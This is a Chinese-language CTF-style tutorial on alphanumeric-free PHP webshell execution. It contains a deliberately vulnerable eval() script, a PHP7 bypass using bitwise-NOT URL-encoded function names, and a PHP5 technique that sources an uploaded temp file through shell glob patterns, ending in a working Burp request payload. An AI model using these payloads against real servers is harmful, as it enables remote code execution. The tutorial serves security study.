RCE-无字母数字webshell命令执行

目录

1.源码

2.题目解析

3.利用方法

3.1 PHP7下如何实现

3.2PHP5下如何实现

3.2.1 shell下可以利用. 来执行任意脚本

3.2.2 Linux文件名支持用glob通配符代替        

---

1.题目源码

<?php
if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(strlen($code)>35){
        die("Long.");
    }
    if(preg_match("/[A-Za-z0-9_$]+/",$code)){
        die("NO.");
    }
    eval($code);
}else{
    highlight_file(__FILE__);
}

2.题目解析

  根据上述代码可以得出：

1. webshell长度不超过35位

2. 除了不包含字母数字，还不能包含$和_

因为$不能使用了，所以我们无法构造PHP中的变量。所以，如何解决这个问题？

3.利用方法

3.1 PHP7下如何实现

 PHP7前是不允许用`($a)();`这样的方法来执行动态函数的，但PHP7中增加了对此的支持。可以通过('phpinfo')();来执行函数，第一个括号中可以是任意PHP表达式。

不能使用字母，所以我们使用url编码来表示：

(%8F%97%8F%96%91%99%90)();

因为在linux中~是表示反码，既就是取反。刚好加在前面就可以。所以我们得到：

(~%8F%97%8F%96%91%99%90)();

测试之后结果如下：

测试结束，方法可用

3.2PHP5下如何实现

因为php5并不支持刚才这种表达方式，所以我们必须得另辟蹊径

3.2.1 shell下可以利用. 来执行任意脚本

考虑用“反引号”+“shell”的方式来getshell，因为反引号不属于“字母”、“数字”，所以我们可以执行统命令，但问题来了：如何利用无字母、数字、$的系统命令来getshell？

它的作用和source一样，就是用当前的shell执行一个文件中的命令。比如：当前运行的shell是bash，则. file的意思就是用bash执行file文件中的命令。而且用. file执行文件，是不需要file有x权限的。    

如果目标服务器上有一个我们可控的文件，那不就可以利用.来执行它了吗？

        这个文件也很好得到，我们可以发送一个上传文件的POST包，此时PHP会将我们上传的文件保存在临时文件夹下，默认的文件名是/tmp/phpXXXXXX，文件名最后6个字符是随机的大小写字母。

3.2.2 Linux文件名支持用glob通配符代替
        

 执行. /tmp/phpXXXXXX，也是有字母的。此时就可以用到Linux下的glob通配符：

 1）*可以代替0个及以上任意字符

 2）?可以代表1个任意字符

 那么，/tmp/phpXXXXXX就可以表示为/*/?????????或/???/?????????。

但如果执行. /???/?????????，页面会显示错误

这是由于执行. /???/?????????通配符后的文件有很多

     可以看出存在这么多的文件，执行第一个匹配上的文件（即/bin/addr2l ine）的时候就已经出现了错误，导致整个流程停止，根本不会执行到我们上传的文件。

就跟正则表达式类似，glob支持利用[0-9]来表示一个范围。

     我们再来看看之前列出可能干扰我们的文件,发现所有文件名都是小写，只有PHP生成的临时文件包含大写字母。我们只要找到一个可以表示“大写字母”的glob通配符，就能精准找到我们要执行的文件。

翻开ascii码表，可见大写字母位于@与[之间:

所以我们可以利用[@-[]来表示大写字母，构造如下payload：

. /???/????????[@-[]

前端页面源码 

<!DOCTYPE html>
<html lang="en">
 
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
 
<body>
    <form action="web.php" method="post" enctype="multipart/form-data">
        <input type="file" name="upload_file" id="">
        <input type="submit" value="submit">
    </form>
</body>
 

web.php源码 

<?php
if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(strlen($code)>35){
        die("Long.");
    }
    if(preg_match("/[A-Za-z0-9_$]+/",$code)){
        die("NO.");
    }
    eval($code);
}else{
    highlight_file(__FILE__);
}

编写一个txt文件上传至前端页面

接下来使burp suite进行测试

在第一行传入payload：

?><?=`.+/%3f%3f%3f/%3f%3f%3f%3f%3f%3f%3f%3f%[%40-[]`%3b 

 结果如下：

然后将我们修改好的包发送，得到如下结果：

 测试成功！

以上就是在php7和php5下的无字母数字的webshell 命令执行。